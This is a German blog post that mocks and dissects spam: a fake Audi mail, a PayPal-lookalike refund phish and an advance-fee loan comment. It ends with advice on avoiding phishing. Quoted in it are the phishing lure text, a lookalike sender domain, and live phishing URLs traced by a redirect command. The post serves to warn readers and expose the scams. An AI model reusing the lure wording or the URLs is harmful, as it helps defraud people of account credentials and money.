Alle Preise entsprechen dem Stand Oktober 2024 und sind unter Vorbehalt möglicher Änderungen. Irrtümer und Zwischenverkauf vorbehalten.

Kontakt:
E-Mail: kontakt@audi-███████-events.de
Telefon: +49-841-90-██-██-51

Oh, Oktober 2024? Habt ihr schon wieder vergessen, euren Kalender zu stellen? 🤭️

Vielen Dank für Ihr Vertrauen an unseren Fahrzeugen!

Vielen Dank für den pseudohöflichen Dank für Nichts, der in Wirklichkeit ein dummer und übergriffiger psychologischer Manipulationsversuch ist. Vor meinem Arsch ist auch kein Gitter! 👅️

AUDI AG | Ingolstadt | kontakt@audi-███████-events.de
Tel: +49-841-90-██-██-51 | Newsletter abbestellen

Nein, das ist kein „Newsletter“. Das ist eine Spam.

Entf! 🗑️

Information zu Ihrer Online-Rückerstattung

Dienstag, 30. September 2025

Was ist denn eine Online-Rückerstattung. Kriege ich da mein „Online“ zurück? 😁️

Von: Paуpal <postmaster@647fdc28cd.nxcli.io>

Das ist ganz sicher nicht PayPal. 🎣️

Paypal PNG Images | Vecteurs Et …

Das ist ganz sicher nicht PayPal. 🎣️🤥️

Rückerstattungsanforderung erfolgreich akzeptiert

„Erfolgreich akzeptiert“ ist ein tolles Wort. Klingt wie das genaue Gegenteil von „erfolglos abgewiesen“. 😅️

Guten Morgen,

Genau mein Name!

Wir möchten Sie darüber informieren, […]

Dann tut es doch!

[…] dass Ihre Online-Rückerstattung zur Bearbeitung bereitsteht. Bitte führen Sie die erforderlichen Schritte aus, um sie zu erhalten.

Um Ihre Rückerstattung zu erhalten, verwenden Sie bitte den folgenden Link:

Online-Rückerstattung

Der Link führt natürlich nicht zu PayPal. 🎣️

$ location-cascade "https://chscompaines.10web.cloud/bobo.php"
     1	https://updt-post-inder.codeanyapp.com/plp/sd/id/
     2	signin.php?enc=62dcf9606e572bbd1d6612ee4fc17cde&p=0&dispatch=91e819e167f8d558d2dee110764d8ceb25967e42
$ _

Dort darf man dann Verbrechern den Vollzugriff auf sein PayPal-Konto gewähren, denn die Anmeldedaten, die man dort in einem „liebevoll“ nachgemachten PayPal-Login angibt, gehen direkt an Trickbetrüger:

Screenshot der Phishing-Seite: Nachgemachtes PayPal-Login

Wenn man in die Adressleiste seines Browsers schaut, sieht man, dass man sich gar nicht auf der Website von PayPal befindet. Dafür haben Webbrowser übrigens diese Adressleiste: Dass man auch weiß, wo man gerade ist. Dafür muss man nur hingucken. Es ist beinahe immer gut, zu wissen, wo man ist.

Zum Glück für uns alle gibt es einen ganz einfachen und sehr zuverlässigen Schutz gegen Phishing, einer der häufigsten Trickbetrugsformen im gegenwärtigen Internet: Niemals in eine E-Mail klicken! Wenn man sich für Websites wie PayPal Lesezeichen im Webbrowser anlegt und diese Websites nur noch über diese Lesezeichen aufruft, dann kann einem kein Betrüger so leicht einen irreführenden Link in einer E-Mail unterschieben. Wenn man eine solche Mail empfangen hat und sich unsicher ist, ob sie nicht vielleicht doch echt sein könnte: Einfach die Website von PayPal über das Lesezeichen im Webbrowser aufrufen und sich dort wie gewohnt anmelden! Wenn man dort keine entsprechende Benachrichtigung sieht, hat man einen dieser gefürchteten Cyberangriffe abgewehrt (und sich viel Ärger erspart). So einfach geht das. Macht das! 🛡️

Wenn Sie dem Link nicht innerhalb von 48 Stunden folgen, erfolgt keine Rückerstattung. So reichen Sie eine weitere Rückerstattungsanfrage ein.

Nicht nachdenken, klicken! Sonst kriegt das Geld Flügel! 💸️

Fristsetzungen von zwei Tagen sind übrigens sittenwidrig.

Für weitere Informationen kontaktieren Sie uns bitte unter support@paуpal.de

Bitte nicht an die Absenderadresse antworten!

Bedankt voor uw vertrouwen.

Ich vermute mal, für den Spammer, der weder das eine noch das andere wirklich kennt, sieht Niederländisch im Schriftbild genau so unverständlich wie Deutsch aus. Het is jammer als je helemaal geen hersenen hebt. 😄️

© Copyright 2025 by PayPal

Keine dumme Spam ist vollständig ohne das proklamierte „geistige Eigentum“ auf einen Stummeltext, der nicht einmal in die Nähe der dafür erforderlichen Schöpfungshöhe kommt. Das liegt daran, dass echte Unternehmen genau die gleiche dumme, intelligenzverachtende, hilflos jurafuchtelnde und einschüchternsollende und juristisch völlig wirkungslose Angewohnheit haben.

Verklag mich für mein Vollzitat, Spammer! 😂️

Entf! 🗑️

Monique müler

Montag, 29. September 2025

So nannte sich die Gestalt mit ihrer IP-Adresse aus Deutschland – ich sage es ja immer wieder: Geoblocking hilft nicht gegen Spam, denn Spammer wissen auch, was ein VPN oder ein Proxyserver ist – die heute mittag um 13:07 Uhr den folgenden Kommentar zur Einleitung eines Vorschussbetruges eigenhändisch über die Zwischenablage ins Kommentarfeld kopiert und abgesendet hat:

Sehr geehrte Damen und Herren, nach vielen Enttäuschungen und Betrugsfallen habe ich endlich ein Unternehmen gefunden, das seine Versprechen hält. Dank ihnen konnte ich problemlos einen Kredit für mein Projekt erhalten. Diese Chance hat mir geholfen, wieder Vertrauen zu fassen und beruhigt weiterzumachen.

Wenn Sie ein solides Projekt haben und finanzielle Unterstützung suchen, ermutige ich Sie, sich zu informieren und Ihr Glück zu versuchen. Die Fördermöglichkeiten reichen von 5.000 bis 100.000 €. Hinweis: Seien Sie immer vorsichtig und überprüfen Sie die Informationen, bevor Sie etwas unternehmen. Sie können das Unternehmen direkt per E-Mail kontaktieren, um Ihren Kredit zu erhalten: mari█████et538@gmail.com

Aber immer schön vorsichtig sein! Einfach das Darlehen bei der GMail-Bank (ohne Website, Impressum oder sonstiges Gedöns, allerdings sehr oft noch mit WanzApp-Nummer) abholen, Vertrauen fassen und nach längeren Telefongesprächen mit gewerbsmäßigen Trickbetrügern beruhigt eine Vorleistung nach der anderen bezahlen – natürlich über anonymisierende technische Verfahren wie Western Union oder Kryptogeld, denn diese GMail-Bank hat leider gar kein Bankkonto. Das Geld ist auch gar nicht weg. Es wird nur von den Betrügern ins Bordell getragen.